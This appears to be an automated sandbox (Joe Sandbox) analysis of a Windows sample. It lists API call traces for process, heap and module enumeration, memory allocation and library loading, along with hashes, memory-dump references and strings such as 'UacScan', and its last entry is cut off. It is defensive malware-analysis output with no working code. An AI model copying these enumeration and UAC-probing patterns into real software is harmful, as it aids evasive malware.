                                                                                                                                • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                                • Instruction ID: 689aa3e55300baa8d82d5d4a03db8df8f7f6a3a474eda69cfbbca0c96b945e3a
                                                                                                                                • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                                • Instruction Fuzzy Hash: AFC08CF27132000B5E60A6FC3DC421942891988338B601E21E438CA2C2EF26B8322C20
                                                                                                                                APIs
                                                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,02A2041F,ScanString,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,ScanString,02A87380,02A2B7B8,UacScan,02A87380,02A2B7B8,UacInitialize), ref: 02A07E67
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AttributesFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                • Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                                • Instruction ID: 5ad6de27a65e4270c3ee618b3eb0417ede327eabcf6cdda37e0d8b0b642cd880
                                                                                                                                • Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                                • Instruction Fuzzy Hash: 6AC08CA02032000A9A5466FC3DC4249528A19083383640A21A438C62E2EF32B8B26C10
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeString
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3341692771-0
                                                                                                                                • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                                • Instruction ID: 39a837616249aca10bc6f9f7df0dac6b3157909163a34b6899b1d77f4a127f91
                                                                                                                                • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                                • Instruction Fuzzy Hash: 51C012A264023057EB215799BDC475262DCAB0D394B1400A1A504D7290EB609C0046A0
                                                                                                                                APIs
                                                                                                                                • timeSetEvent.WINMM(00002710,00000000,02A2C350,00000000,00000001), ref: 02A2C36C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Eventtime
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2982266575-0
                                                                                                                                • Opcode ID: a2f36b6970035f10dfa8706d1ec30a1559cc0cb398cea3c974bd628d5f646370
                                                                                                                                • Instruction ID: 2cab0f8d4a34c3aaeb3d7e284ba95d73bb9038495e78c39472c03aa03740f261
                                                                                                                                • Opcode Fuzzy Hash: a2f36b6970035f10dfa8706d1ec30a1559cc0cb398cea3c974bd628d5f646370
                                                                                                                                • Instruction Fuzzy Hash: 92C092F17D03103AFA1096A96DC2F37569ED309BA0F100A52B704EE2C1EAF368144EA8
                                                                                                                                APIs
                                                                                                                                • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02A04C3F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocString
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2525500382-0
                                                                                                                                • Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                                • Instruction ID: 385adb42dc4536becd83471a18d7b898e6e84f003783c0cf2484ad3e9dec095d
                                                                                                                                • Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                                • Instruction Fuzzy Hash: D9B0123424830116FB1823623FC0773004C2B8C38BF840061AF18C80D0FF04C4018835
                                                                                                                                APIs
                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02A04C57
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeString
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3341692771-0
                                                                                                                                • Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                                • Instruction ID: 8c5d0282075698cddacde4ba7e1f0dfd6e043a7188ccd89f698418ec80f6badd
                                                                                                                                • Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                                • Instruction Fuzzy Hash: 20A022AC8003030A8F0B332C22E002F22333FEC3003C8C0F823000A0C08F3A8000AC30
                                                                                                                                APIs
                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02A01A03), ref: 02A015E2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                • Opcode ID: 695bcf13819216aed620f3fac15ccf0a6c7caf614272b7402a2a7e558350ae28
                                                                                                                                • Instruction ID: 9a8ef46ccd261e72386267a22223449ccdf04c84f62fab9da701032669fe19fb
                                                                                                                                • Opcode Fuzzy Hash: 695bcf13819216aed620f3fac15ccf0a6c7caf614272b7402a2a7e558350ae28
                                                                                                                                • Instruction Fuzzy Hash: C2F049F0B813018FEB09DFB9AE803457AE2E78E344F108579E609DB3C8EB7184028B00
                                                                                                                                APIs
                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 02A016A4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                • Opcode ID: 8e733aff740ca8cab6cdeaf0ec7bc29c6f9e873f426abcb5fe0aa4befe8173fa
                                                                                                                                • Instruction ID: 434b9ea1cd97c65ef9a7f663cd283b732888687fbf039a2a97aef86d78cd3cdc
                                                                                                                                • Opcode Fuzzy Hash: 8e733aff740ca8cab6cdeaf0ec7bc29c6f9e873f426abcb5fe0aa4befe8173fa
                                                                                                                                • Instruction Fuzzy Hash: B1F0B4B2B40795AFE7109F5AACC0782BB98FB04715F050139F90C9B380DB70E8118BD4
                                                                                                                                APIs
                                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02A01FE4), ref: 02A01704
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1263568516-0
                                                                                                                                • Opcode ID: 9009866b5486c49bdde14ec2b5c088cd9472b211c4519463acecbc27ac4ae711
                                                                                                                                • Instruction ID: d2298846e121700d359be4d0942277291ca4bd30f210945831731295bd1201d2
                                                                                                                                • Opcode Fuzzy Hash: 9009866b5486c49bdde14ec2b5c088cd9472b211c4519463acecbc27ac4ae711
                                                                                                                                • Instruction Fuzzy Hash: 55E08675340301AFE7105B7D6DC0792ABDCEB48754F144475F609DB2C1EA60E8108B60
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02A1ADA3,?,?,02A1AE35,00000000,02A1AF11), ref: 02A1AB30
                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02A1AB48
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02A1AB5A
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02A1AB6C
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02A1AB7E
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02A1AB90
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02A1ABA2
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02A1ABB4
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02A1ABC6
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02A1ABD8
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02A1ABEA
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02A1ABFC
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02A1AC0E
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02A1AC20
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02A1AC32
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02A1AC44
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02A1AC56
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                • API String ID: 667068680-597814768
                                                                                                                                • Opcode ID: fcdfc3f9597340254df0df00f0f15e7c384e0a24e5f4b33a24e697d6cbe8c6e8
                                                                                                                                • Instruction ID: 914438d7f074fd2c88e49603c338e0cd95628db1ed2b573d04ce4aa56ea925ef
                                                                                                                                • Opcode Fuzzy Hash: fcdfc3f9597340254df0df00f0f15e7c384e0a24e5f4b33a24e697d6cbe8c6e8
                                                                                                                                • Instruction Fuzzy Hash: 7B31CDF4A81750AFEF09EBE4EDC5A2977EDBB15715B100961A401CF245EE78E822CF21
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,02A06C14,02A00000,02A2E790), ref: 02A05925
                                                                                                                                • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02A0593C
                                                                                                                                • lstrcpynA.KERNEL32(?,?,?), ref: 02A0596C
                                                                                                                                • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02A06C14,02A00000,02A2E790), ref: 02A059D0
                                                                                                                                • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02A06C14,02A00000,02A2E790), ref: 02A05A06
                                                                                                                                • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02A06C14,02A00000,02A2E790), ref: 02A05A19
                                                                                                                                • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02A06C14,02A00000,02A2E790), ref: 02A05A2B
                                                                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02A06C14,02A00000,02A2E790), ref: 02A05A37
                                                                                                                                • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02A06C14,02A00000), ref: 02A05A6B
                                                                                                                                • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02A06C14), ref: 02A05A77
                                                                                                                                • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02A05A99
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                • API String ID: 3245196872-1565342463
                                                                                                                                • Opcode ID: b09f6c85f3accfa64d35358ac7bd7d266cdfa5ec985fac246f17b90e1819ea33
                                                                                                                                • Instruction ID: c0930a488cf53ea1e09f46b1c86adfcc7c55c70afd4b1654121161ff66cfe2a7
                                                                                                                                • Opcode Fuzzy Hash: b09f6c85f3accfa64d35358ac7bd7d266cdfa5ec985fac246f17b90e1819ea33
                                                                                                                                • Instruction Fuzzy Hash: 79416D71D40619ABDB10DBE8DDC8ADEB7BDBF08340F4445A5A548E7281EB709E448F50
                                                                                                                                APIs
                                                                                                                                • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02A05BE8
                                                                                                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02A05BF5
                                                                                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02A05BFB
                                                                                                                                • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02A05C26
                                                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02A05C6D
                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02A05C7D
                                                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02A05CA5
                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02A05CB5
                                                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02A05CDB
                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02A05CEB
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                • API String ID: 1599918012-2375825460
                                                                                                                                • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                                • Instruction ID: e26f68553f6b09218ab6d4e36d1ba9954d18dd90e189274ba19c555bd9323dc8
                                                                                                                                • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                                • Instruction Fuzzy Hash: E7316471E4026C2AEB25D6B4ACC5BDEB7AD9B08384F4401A1A648E61C1EE749E848F90
                                                                                                                                APIs
                                                                                                                                • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02A07FF5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DiskFreeSpace
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1705453755-0
                                                                                                                                • Opcode ID: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                                                                                • Instruction ID: 668058b41acc154101a14d3a9ca164aaed65a97231e57fd7928a540cd106cfd5
                                                                                                                                • Opcode Fuzzy Hash: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                                                                                • Instruction Fuzzy Hash: D411C0B5E00209AF9B04CF99D981DBFF7F9FFC8700B54C569A505E7254E671AA018BA0
                                                                                                                                APIs
                                                                                                                                • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02A0A7E2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoLocale
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2299586839-0
                                                                                                                                • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                                • Instruction ID: 8bf62595047dbf77255b9dd477cdbfd6411fd3ba3166f243fa09d69614d595af
                                                                                                                                • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                                • Instruction Fuzzy Hash: 6AE0927170421417D315A558BDC0EEA725DA75C710F00426ABA09C73C5EDA0AE944AE8
                                                                                                                                APIs
                                                                                                                                • GetVersionExA.KERNEL32(?,02A2D106,00000000,02A2D11E), ref: 02A0B79A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Version
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1889659487-0
                                                                                                                                • Opcode ID: 010a08b00cb7f74ced8a3da4a9c419a90c1dca7232f7ab7cf90c6af5e1e00935
                                                                                                                                • Instruction ID: 9cb446036fe7018d48c82e9aaf97645b9b770b4b6e2bdf563417d2d0c56f3bfb
                                                                                                                                • Opcode Fuzzy Hash: 010a08b00cb7f74ced8a3da4a9c419a90c1dca7232f7ab7cf90c6af5e1e00935
                                                                                                                                • Instruction Fuzzy Hash: D1F0A474945301DFD364DF28E68162577E9FB48714F015D29E698C7380EF34E8A9CB62
                                                                                                                                APIs
                                                                                                                                • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02A0BE72,00000000,02A0C08B,?,?,00000000,00000000), ref: 02A0A823
                                                                                                                                Memory Dump Source
